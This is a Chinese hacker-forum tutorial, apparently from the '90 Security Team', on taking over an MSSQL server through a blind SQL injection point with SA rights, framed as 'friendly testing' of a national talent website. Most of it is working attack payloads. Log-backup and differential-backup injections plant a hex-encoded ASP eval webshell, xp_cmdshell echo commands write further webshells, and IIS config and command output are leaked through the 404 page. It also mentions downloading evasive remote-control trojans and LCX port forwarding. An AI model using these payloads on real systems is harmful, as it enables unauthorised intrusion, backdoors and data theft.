sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
2 \4 h/ m/ h7 s" R* C. c5 C
) j5 x" u, X' n' D0 q2 ^( c
5 \, N  L0 Q! K% f0 {                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
5 V8 @" Z* t' q7 d# b
+ w! K. }9 p/ |$ l5 x, V6 ]8 y                                                                 
                                                                 
* Q8 I6 M2 [) F: d( T) [# E                                                                  论坛： http://www.90team.net/


6 m9 H+ x: J& n2 b& i' d
9 e5 }' _$ J: |; J3 g友情检测国家人才网
0 k  \: C8 `: F: D* u  t( l- v1 f
" Y% Z$ J0 H; L5 K- w% Y& k+ Q
内容：MSSQL注入SA权限不显错模式下的入侵


4 f% ?+ V9 n8 F( A3 d5 }; R% P一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

: v) N" C' k: S) X: u" X! [/ C我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。

" D* t$ Y: Z. }; [' a
( Q0 e9 z% W% g( V& u这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。

$ e* J$ `1 [& p& ], |( a" H$ @5 a思路：

3 V) W4 H0 ]% _首先：

  `7 E0 ]" r. O2 r# R$ k通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

1.日志备份获得Webshell
4 d0 I7 F" _+ `( }: j
2.数据库差异备份获得Webshell
) K% d5 P1 C/ [" C/ P7 [
1 d) ~$ z" R: W! o6 _* F! W2 H4 f4.直接下载免杀远控木马。

, S3 Q' X3 P8 A! }/ \5.直接下载LCX将服务器端口转发出来
2 Z5 T8 [; \- I- c) i
; x" u( C( P; j6 Q8 W' V  F' s6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。


; M/ [$ _: k- A: Z
在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
' X/ ?$ H2 ]- {0 [' _/ K0 Z  y( u
. F7 X& \, Y% i! z5 U0 j我直接演示后面一个方法
  [2 v+ T$ a' G4 ~: v

% o7 }3 P  U9 A- F: j: \分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
" A& F( W$ L- x2 W  A
0 X; x' u: w- F  v% f  S9 t7 g* e" t1 [

: Q; I* W$ d  a' e& r5 q+ A
◆日志备份：
) Q# l  m5 i/ P6 j8 F; p
. h) A; L- w" ]  z$ I7 x- ~
1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

0 h( V; }& D: D  `. `, {% H) f0 d2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
4 N. w) A8 i+ s* r4 Y" T
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  
3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--

' D7 R8 @' G2 W# c: A( f

◆数据库差异备份

# @* `/ c% f) G+ ^（1. 进行差异备份准备工作
; N+ o+ f, A; Z$ A5 y; `: o
4 n3 N. e$ ~. ^& ];Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
: ^( g+ K: J( Y, A* d0 G
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
  j1 i3 p9 v% T  @9 E

4 n1 u0 ^; O, P/ m8 z* h$ H& n7 l5 N（2. 将数据写入到数据库
( t& B! D  |5 T- m;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

+ B9 ~2 |+ @- U( r& h$ K" z0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>

3. 备份数据库并清理临时文件

;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
- L: b4 [6 K5 A! o
) Y: J/ T9 b% B0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
/ }; v) ]. K5 b' A; Y0 e" o5 P$ {$ L- D
  d0 `" e9 x/ L- P9 |; ^0 j) W

! c: h6 i9 O, C7 e/ s) ^. p1 I用^转义字符来写ASP(一句话木马)文件的方法:   

1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
4 N1 Q* N+ o% A# o& ]0 Y- }, r# @' h
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
, W$ _8 J4 [: X, Y6 [$ F
$ x9 \. U. h/ Y* k$ w读取IIS配置信息获取web路径
- j( [( H1 G6 |
% X. o- N4 ^, v5 m2 T     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

执行命令
% g- z! p6 @  ^9 c2 a     
1 u9 \+ P' Z3 ]     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--

# z# i0 a* Z: v3 h1 b

) ]$ B% Z8 x. }; {/ |0 K
( }: x8 B+ e6 y3 J* A
8 L6 Q4 l/ o* F1 ~" Z# Q  k
, G" @  ^- ]* ^* I/ G1 N


% J$ W+ K& x4 ^  V9 s

- K; e+ O( z) I
0 e  \1 j" z0 J8 i' _* l* e4 H( U

% C- d- p, H2 d  Y+ \4 S

% g) S# x! [$ o
8 y- o7 X3 F/ B! q( @' X
- C. e3 i$ k  C- z. G# e
7 o, ]" U' D4 b* `' G% P) V: j5 ?
9 G/ Z! p8 s. r3 ?; Y+ z) ]
, u' g3 q7 O6 k9 ~$ s7 A3 ~
& {  N& s8 v' A9 C
+ ?. n- {; y, O4 \* ~
2 O/ T3 ?, o9 C: x
+ F  c: A/ K2 ]7 V! |5 r
6 F1 g* D- R& w, B7 T, F6 B/ _
* X0 d, T- S" s1 \7 ?
8 Q9 G( X+ x2 m8 S
' B* |! T) o5 m; g; a
# q- b6 b' Y. A, t. q6 D
( R" K9 A% F( J6 I2 o; ~! u
5 y& Q+ e9 \# {; B7 Y. N2 B
  B2 z+ {. C! {5 ~3 v$ b
6 a. @4 P. O2 m* [


1 c0 ^- c. T5 j2 ?8 z; }+ e. T# N
5 a# X' p! e* {! r4 a7 z
7 m* T$ r4 \" w7 f/ n& N9 a; L
7 f' x% m) Z0 G" c/ N/ \2 L( V
: N: ~" r5 x! d; F& d
" q% G, k1 `6 D! z2 M' }% u

& k- k& f8 y, ^! A5 o, |
: E) ?! L: Q) S0 G7 F# H! ?
! Q5 t4 |2 ?  w* m# V
+ u. k! x' k+ O3 t
0 M2 q2 M* H3 l- k8 Q